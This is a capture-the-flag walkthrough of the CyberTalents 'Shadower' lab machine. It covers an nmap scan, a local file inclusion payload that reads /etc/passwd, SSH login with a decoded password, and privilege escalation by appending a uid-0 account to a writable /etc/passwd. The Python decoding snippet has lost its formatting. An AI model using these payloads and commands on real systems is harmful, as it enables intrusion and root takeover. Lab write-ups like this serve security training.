CyberTalents Shadower Machine Walkthrough, we will do
Scanning, enumeration, get a user shell, privilege escalation and Capture the Flag!!
Challenge Link:
https://cybertalents.com/challenges/machines/shadower
Scanning:
identify open ports and services, we used nmap Aggressive scan (-A) on all ports (-p-) and speed up with (T4)
nmap -A -p- -T4 172.24.209.176 -oA shadower
Found Open ports: HTTP service on port 80 and SSH on port 22
Enumeration:
Using dirb tool, We found index.php
browser it, and clicking available links and view pages source (CTRL+U)
view-source:http://172.24.209.176/index.php?view=contact-us.html
Found interesting text: my0wns3cr3t.sec
It maybe a password or directory or a file!!
Try it as a path :
view-source:http://172.24.209.176/index.php?view=my0wns3cr3t.sec
It is a long base64 encoded string:
Base64 Decode
Trying to decode it, it produces another base64 string, tried to decode the result multiple times but still produce another base64 string.
It is multi cyclic encoding, I tried to automate the process using python script:
#!/usr/bin/python3
import base64
encoded_text = “….ENCODED_STRING_HERE….”
temp = []while True:
try:
decoded = base64.b64decode(encoded_text)
encoded_text = decoded
except:
break
temp.append(decoded)
print(temp[-2])
Got a string: B100dyPa$$w0rd
Notice: remove the binary indicator character and the single quotes (b”)
Keep browsing other links, found LFI vulnerability and We can read passwd file!
http://172.24.209.176/index.php?view=../../../../../../etc/passwd
Get a shell
we can see usernames for that box, user john seems to be the actual user.
let’s try to ssh for user john with the encoded result as password
ssh john@172.24.209.176
Password: B100dyPa$$w0rd
We Got a user shell
Privilege Escalation:
upload linpease.sh script to enumerate for higher privileges paths.
just copy its content to a file, or you could get it from your local machine using scp, http server, ftp, .. or as you like.
vim linpeas.sh
chmod +x linpeas.sh
bash linpeas.sh
After reviewing the result, seems we can write to /etc/passwd !!
let’s inject our root user.
Root the machine
Create encrypted password using openssl
openssl passwd hackme
1BQF1p1LiZUVQ
Create a user named hackme with the encrypted password we just created with id of (0) like the root id
echo hackme:1BQF1p1LiZUVQ:0:0:hackme:/root:/bin/bash >> /etc/passwd
Switch to the new user
su hackme
Password:
We are root
root@ip-172-31-43-49:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@ip-172-31-43-49:/home/john#
Capture The Flag:
It’s time to win the prize, read the content of the flag file named root.txt in /root directory
cat /root/root.txt